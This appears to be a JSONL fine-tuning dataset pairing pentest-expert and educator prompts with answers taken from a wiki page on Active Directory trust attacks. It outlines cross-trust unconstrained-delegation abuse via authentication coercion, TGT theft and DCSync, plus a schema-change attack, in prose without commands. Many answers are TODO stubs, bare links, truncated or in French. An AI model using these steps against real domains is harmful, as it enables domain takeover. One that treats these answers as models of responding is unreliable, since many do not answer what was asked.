https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Trusts - 🛠️ DNS trust?", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research", "metadata": {"corpus_index": 1160, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - 🛠️ GoldenGMSA work?"}, {"role": "assistant", "content": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - 🛠️ GoldenGMSA work?", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent", "metadata": {"corpus_index": 1161, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Trusts - 🛠️ GoldenGMSA"}, {"role": "assistant", "content": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Trusts - 🛠️ GoldenGMSA", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent", "metadata": {"corpus_index": 1161, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - 🛠️ Schema change attack (source)"}, {"role": "assistant", "content": "Depuis le domaine source, en tant que SYSTEM, on peut modifier le schéma dans la partition de Configuration puis attendre que ce soit répliqué sur le domaine cible\n\nPlus particulièrement en modifiant le defaultSecurityDescriptor de classes intéressantes (groupes, users, GPC), ou retirant le flag confidential"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - 🛠️ Schema change attack (source)", "response": "Depuis le domaine source, en tant que SYSTEM, on peut modifier le schéma dans la partition de Configuration puis attendre que ce soit répliqué sur le domaine cible\n\nPlus particulièrement en modifiant le defaultSecurityDescriptor de classes intéressantes (groupes, users, GPC), ou retirant le flag confidential", "metadata": {"corpus_index": 1162, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Trusts - 🛠️ Schema change attack (source) during a pentest?"}, {"role": "assistant", "content": "Depuis le domaine source, en tant que SYSTEM, on peut modifier le schéma dans la partition de Configuration puis attendre que ce soit répliqué sur le domaine cible\n\nPlus particulièrement en modifiant le defaultSecurityDescriptor de classes intéressantes (groupes, users, GPC), ou retirant le flag confidential"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Trusts - 🛠️ Schema change attack (source) during a pentest?", "response": "Depuis le domaine source, en tant que SYSTEM, on peut modifier le schéma dans la partition de Configuration puis attendre que ce soit répliqué sur le domaine cible\n\nPlus particulièrement en modifiant le defaultSecurityDescriptor de classes intéressantes (groupes, users, GPC), ou retirant le flag confidential", "metadata": {"corpus_index": 1162, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Trusts - Unconstrained delegation abuse"}, {"role": "assistant", "content": "In order to abuse unconstrained delegation across trusts, TGT delegation must be allowed/enabled on the trust, and Selective Authentication must NOT be enabled (or with a configuration that would allow for the exploitation detailed below, see the Authentication level chapter).\n\nIn addition to that, the ideal setup would be to have a two-way trust between the compromised domain (A) and the target domain (B), in order to allow the exploitation detailed below.\n\n1. (trusting B -> trusted A), allows access from A to B, allows to coerce authentications\n2. (trusting A -> trusted B), allows access from B to A, allows the coerced account to authenticate to the attacker-controlled KUD account.\n\nOther regular KUD-abuse-specific requirements apply (e.g. accounts not sensitive for delegation or member of the protected users group), see the Kerberos Unconstrained Delegation page.\n\nIf an attacker manages to gain control over an account configured for unconstrained delegation, he could escalate to domain admin privileges. Across trusts, the scenario is very similar. An attacker needs to gain control over a trusted account, configured for KUD (Kerberos Unconstrained Delegation), in order to act on a trusting resource (e.g. trusting domain's DC) as another principal (i.e. domain admin).\n\n> [!TIP]\n> By default, all domain controllers are configured for unconstrained delegation.\n\nThe Kerberos Unconstrained Delegation page can be consulted in order to obtain operational guidance on how to abuse this context.\n\nIn most cases, the attacker will have to:\n\n1. coerce the authentication (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.) of a high-value target (e.g. domain controller) of the trusting domain\n2. retrieve the TGT delegated in the service ticket the trusting resource used to access the attacker-controlled KUD account\n3. authenticate to trusting resources using the extracted TGT (Pass the Ticket) in order to conduct privileged actions (e.g. DCSync)\n\n> [!TIP]\n> Read the Unconstr"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Trusts - Unconstrained delegation abuse", "response": "In order to abuse unconstrained delegation across trusts, TGT delegation must be allowed/enabled on the trust, and Selective Authentication must NOT be enabled (or with a configuration that would allow for the exploitation detailed below, see the Authentication level chapter).\n\nIn addition to that, the ideal setup would be to have a two-way trust between the compromised domain (A) and the target domain (B), in order to allow the exploitation detailed below.\n\n1. (trusting B -> trusted A), allows access from A to B, allows to coerce authentications\n2. (trusting A -> trusted B), allows access from B to A, allows the coerced account to authenticate to the attacker-controlled KUD account.\n\nOther regular KUD-abuse-specific requirements apply (e.g. accounts not sensitive for delegation or member of the protected users group), see the Kerberos Unconstrained Delegation page.\n\nIf an attacker manages to gain control over an account configured for unconstrained delegation, he could escalate to domain admin privileges. Across trusts, the scenario is very similar. An attacker needs to gain control over a trusted account, configured for KUD (Kerberos Unconstrained Delegation), in order to act on a trusting resource (e.g. trusting domain's DC) as another principal (i.e. domain admin).\n\n> [!TIP]\n> By default, all domain controllers are configured for unconstrained delegation.\n\nThe Kerberos Unconstrained Delegation page can be consulted in order to obtain operational guidance on how to abuse this context.\n\nIn most cases, the attacker will have to:\n\n1. coerce the authentication (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.) of a high-value target (e.g. domain controller) of the trusting domain\n2. retrieve the TGT delegated in the service ticket the trusting resource used to access the attacker-controlled KUD account\n3. authenticate to trusting resources using the extracted TGT (Pass the Ticket) in order to conduct privileged actions (e.g. DCSync)\n\n> [!TIP]\n> Read the Unconstr", "metadata": {"corpus_index": 1163, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - Unconstrained delegation abuse"}, {"role": "assistant", "content": "In order to abuse unconstrained delegation across trusts, TGT delegation must be allowed/enabled on the trust, and Selective Authentication must NOT be enabled (or with a configuration that would allow for the exploitation detailed below, see the Authentication level chapter).\n\nIn addition to that, the ideal setup would be to have a two-way trust between the compromised domain (A) and the target domain (B), in order to allow the exploitation detailed below.\n\n1. (trusting B -> trusted A), allows access from A to B, allows to coerce authentications\n2. (trusting A -> trusted B), allows access from B to A, allows the coerced account to authenticate to the attacker-controlled KUD account.\n\nOther regular KUD-abuse-specific requirements apply (e.g. accounts not sensitive for delegation or member of the protected users group), see the Kerberos Unconstrained Delegation page.\n\nIf an attacker manages to gain control over an account configured for unconstrained delegation, he could escalate to domain admin privileges. Across trusts, the scenario is very similar. An attacker needs to gain control over a trusted account, configured for KUD (Kerberos Unconstrained Delegation), in order to act on a trusting resource (e.g. trusting domain's DC) as another principal (i.e. domain admin).\n\n> [!TIP]\n> By default, all domain controllers are configured for unconstrained delegation.\n\nThe Kerberos Unconstrained Delegation page can be consulted in order to obtain operational guidance on how to abuse this context.\n\nIn most cases, the attacker will have to:\n\n1. coerce the authentication (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.) of a high-value target (e.g. domain controller) of the trusting domain\n2. retrieve the TGT delegated in the service ticket the trusting resource used to access the attacker-controlled KUD account\n3. authenticate to trusting resources using the extracted TGT (Pass the Ticket) in order to conduct privileged actions (e.g. DCSync)\n\n> [!TIP]\n> Read the Unconstr"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - Unconstrained delegation abuse", "response": "In order to abuse unconstrained delegation across trusts, TGT delegation must be allowed/enabled on the trust, and Selective Authentication must NOT be enabled (or with a configuration that would allow for the exploitation detailed below, see the Authentication level chapter).\n\nIn addition to that, the ideal setup would be to have a two-way trust between the compromised domain (A) and the target domain (B), in order to allow the exploitation detailed below.\n\n1. (trusting B -> trusted A), allows access from A to B, allows to coerce authentications\n2. (trusting A -> trusted B), allows access from B to A, allows the coerced account to authenticate to the attacker-controlled KUD account.\n\nOther regular KUD-abuse-specific requirements apply (e.g. accounts not sensitive for delegation or member of the protected users group), see the Kerberos Unconstrained Delegation page.\n\nIf an attacker manages to gain control over an account configured for unconstrained delegation, he could escalate to domain admin privileges. Across trusts, the scenario is very similar. An attacker needs to gain control over a trusted account, configured for KUD (Kerberos Unconstrained Delegation), in order to act on a trusting resource (e.g. trusting domain's DC) as another principal (i.e. domain admin).\n\n> [!TIP]\n> By default, all domain controllers are configured for unconstrained delegation.\n\nThe Kerberos Unconstrained Delegation page can be consulted in order to obtain operational guidance on how to abuse this context.\n\nIn most cases, the attacker will have to:\n\n1. coerce the authentication (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.) of a high-value target (e.g. domain controller) of the trusting domain\n2. retrieve the TGT delegated in the service ticket the trusting resource used to access the attacker-controlled KUD account\n3. authenticate to trusting resources using the extracted TGT (Pass the Ticket) in order to conduct privileged actions (e.g. DCSync)\n\n> [!TIP]\n> Read the Unconstr", "metadata": {"corpus_index": 1163, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - 🛠️ DACL abuse work?"}, {"role": "assistant", "content": "TODO // How a domain admin of forest A could administrate a domain in forest B ? https://social.technet.microsoft.com/Forums/windowsserver/en-US/fa4070bd-b09f-4ad2-b628-2624030c0116/forest-trust-domain-admins-to-manage-both-domains?forum=winserverDS\n\nTODO // Regular permissions, ACE, and whatnot abuses, but now between foreign principals, BloodHound comes in handy."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - 🛠️ DACL abuse work?", "response": "TODO // How a domain admin of forest A could administrate a domain in forest B ? https://social.technet.microsoft.com/Forums/windowsserver/en-US/fa4070bd-b09f-4ad2-b628-2624030c0116/forest-trust-domain-admins-to-manage-both-domains?forum=winserverDS\n\nTODO // Regular permissions, ACE, and whatnot abuses, but now between foreign principals, BloodHound comes in handy.", "metadata": {"corpus_index": 1164, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - 🛠️ DACL abuse"}, {"role": "assistant", "content": "TODO // How a domain admin of forest A could administrate a domain in forest B ? https://social.technet.microsoft.com/Forums/windowsserver/en-US/fa4070bd-b09f-4ad2-b628-2624030c0116/forest-trust-domain-admins-to-manage-both-domains?forum=winserverDS\n\nTODO // Regular permissions, ACE, and whatnot abuses, but now between foreign principals, BloodHound comes in handy."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - 🛠️ DACL abuse", "response": "TODO // How a domain admin of forest A could administrate a domain in forest B ? https://social.technet.microsoft.com/Forums/windowsserver/en-US/fa4070bd-b09f-4ad2-b628-2624030c0116/forest-trust-domain-admins-to-manage-both-domains?forum=winserverDS\n\nTODO // Regular permissions, ACE, and whatnot abuses, but now between foreign principals, BloodHound comes in handy.", "metadata": {"corpus_index": 1164, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Trusts - 🛠️ ADCS abuse?"}, {"role": "assistant", "content": "When an ADCS is installed and configured in an Active Directory environment, a CA is available for the whole forest. Every usual ADCS attack can be executed through intra-forest trusts. ESC8 and ESC11 in particular can be used to pivot to any domain within the forest associated to the C"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Trusts - 🛠️ ADCS abuse?", "response": "When an ADCS is installed and configured in an Active Directory environment, a CA is available for the whole forest. Every usual ADCS attack can be executed through intra-forest trusts. ESC8 and ESC11 in particular can be used to pivot to any domain within the forest associated to the C", "metadata": {"corpus_index": 1165, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Trusts - 🛠️ ADCS abuse?"}, {"role": "assistant", "content": "When an ADCS is installed and configured in an Active Directory environment, a CA is available for the whole forest. Every usual ADCS attack can be executed through intra-forest trusts. ESC8 and ESC11 in particular can be used to pivot to any domain within the forest associated to the C"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Trusts - 🛠️ ADCS abuse?", "response": "When an ADCS is installed and configured in an Active Directory environment, a CA is available for the whole forest. Every usual ADCS attack can be executed through intra-forest trusts. ESC8 and ESC11 in particular can be used to pivot to any domain within the forest associated to the C", "metadata": {"corpus_index": 1165, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - 🛠️ Group memberships work?"}, {"role": "assistant", "content": "// group scoping, https://posts.specterops.io/a-pentesters-guide-to-group-scoping-c7bbbd9c7560"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - 🛠️ Group memberships work?", "response": "// group scoping, https://posts.specterops.io/a-pentesters-guide-to-group-scoping-c7bbbd9c7560", "metadata": {"corpus_index": 1166, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Trusts - 🛠️ Group memberships"}, {"role": "assistant", "content": "// group scoping, https://posts.specterops.io/a-pentesters-guide-to-group-scoping-c7bbbd9c7560"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Trusts - 🛠️ Group memberships", "response": "// group scoping, https://posts.specterops.io/a-pentesters-guide-to-group-scoping-c7bbbd9c7560", "metadata": {"corpus_index": 1166, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - General in the context of penetration testing"}, {"role": "assistant", "content": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-1-the-mechanics/\n\nhttps://syfuhs.net/windows-and-domain-trusts\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc736874(v=ws.10))\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)#ntlm-referral-processing#ntlm-referral-processing)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/bac4dc69-352d-416c-a9f4-730b81ababb3\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/f47e40e1-b9ca-47e2-b139-15a1e96b0e72\n\nhttps://blogs.msmvps.com/acefekay/tag/active-directory-trusts/\n\nhttps://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d\n\nhttps://www.sstic.org/media/SSTIC2014/SSTIC-actes/secrets_dauthentification_pisode_ii__kerberos_cont/SSTIC2014-Slides-secrets_dauthentification_pisode_ii__kerberos_contre-attaque-bordes_2.pdf\n\nhttps://secureidentity.se/msds-shadowprincipal/\n\nhttps://learn.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - General in the context of penetration testing", "response": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-1-the-mechanics/\n\nhttps://syfuhs.net/windows-and-domain-trusts\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc736874(v=ws.10))\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)#ntlm-referral-processing#ntlm-referral-processing)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/bac4dc69-352d-416c-a9f4-730b81ababb3\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/f47e40e1-b9ca-47e2-b139-15a1e96b0e72\n\nhttps://blogs.msmvps.com/acefekay/tag/active-directory-trusts/\n\nhttps://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d\n\nhttps://www.sstic.org/media/SSTIC2014/SSTIC-actes/secrets_dauthentification_pisode_ii__kerberos_cont/SSTIC2014-Slides-secrets_dauthentification_pisode_ii__kerberos_contre-attaque-bordes_2.pdf\n\nhttps://secureidentity.se/msds-shadowprincipal/\n\nhttps://learn.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services", "metadata": {"corpus_index": 1167, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - General?"}, {"role": "assistant", "content": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-1-the-mechanics/\n\nhttps://syfuhs.net/windows-and-domain-trusts\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc736874(v=ws.10))\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)#ntlm-referral-processing#ntlm-referral-processing)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/bac4dc69-352d-416c-a9f4-730b81ababb3\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/f47e40e1-b9ca-47e2-b139-15a1e96b0e72\n\nhttps://blogs.msmvps.com/acefekay/tag/active-directory-trusts/\n\nhttps://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d\n\nhttps://www.sstic.org/media/SSTIC2014/SSTIC-actes/secrets_dauthentification_pisode_ii__kerberos_cont/SSTIC2014-Slides-secrets_dauthentification_pisode_ii__kerberos_contre-attaque-bordes_2.pdf\n\nhttps://secureidentity.se/msds-shadowprincipal/\n\nhttps://learn.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - General?", "response": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-1-the-mechanics/\n\nhttps://syfuhs.net/windows-and-domain-trusts\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc736874(v=ws.10))\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)#ntlm-referral-processing#ntlm-referral-processing)\n\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)?redirectedfrom=MSDN?redirectedfrom=MSDN)\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/bac4dc69-352d-416c-a9f4-730b81ababb3\n\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/f47e40e1-b9ca-47e2-b139-15a1e96b0e72\n\nhttps://blogs.msmvps.com/acefekay/tag/active-directory-trusts/\n\nhttps://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d\n\nhttps://www.sstic.org/media/SSTIC2014/SSTIC-actes/secrets_dauthentification_pisode_ii__kerberos_cont/SSTIC2014-Slides-secrets_dauthentification_pisode_ii__kerberos_contre-attaque-bordes_2.pdf\n\nhttps://secureidentity.se/msds-shadowprincipal/\n\nhttps://learn.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services", "metadata": {"corpus_index": 1167, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Trusts - Offensive POV?"}, {"role": "assistant", "content": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-2-operational-guidance/\n\nhttps://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/\n\nhttps://mayfly277.github.io/posts/GOADv2-pwning-part12\n\nhttps://adsecurity.org/?p=282\n\nhttps://adsecurity.org/?p=1640\n\nhttps://blog.harmj0y.net/redteaming/domain-trusts-were-not-done-yet/\n\nhttps://blog.harmj0y.net/redteaming/the-trustpocalypse/\n\nhttps://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/\n\nhttps://adsecurity.org/?p=4056\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted\n\nhttps://nored0x.github.io/red-teaming/active-directory-Trust-enumeration/\n\nhttps://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d\n\nhttps://adsecurity.org/?p=425\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://www.labofapenetrationtester.com/2019/04/abusing-PAM.html"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Trusts - Offensive POV?", "response": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-2-operational-guidance/\n\nhttps://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/\n\nhttps://mayfly277.github.io/posts/GOADv2-pwning-part12\n\nhttps://adsecurity.org/?p=282\n\nhttps://adsecurity.org/?p=1640\n\nhttps://blog.harmj0y.net/redteaming/domain-trusts-were-not-done-yet/\n\nhttps://blog.harmj0y.net/redteaming/the-trustpocalypse/\n\nhttps://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/\n\nhttps://adsecurity.org/?p=4056\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent\n\nhttps://improsec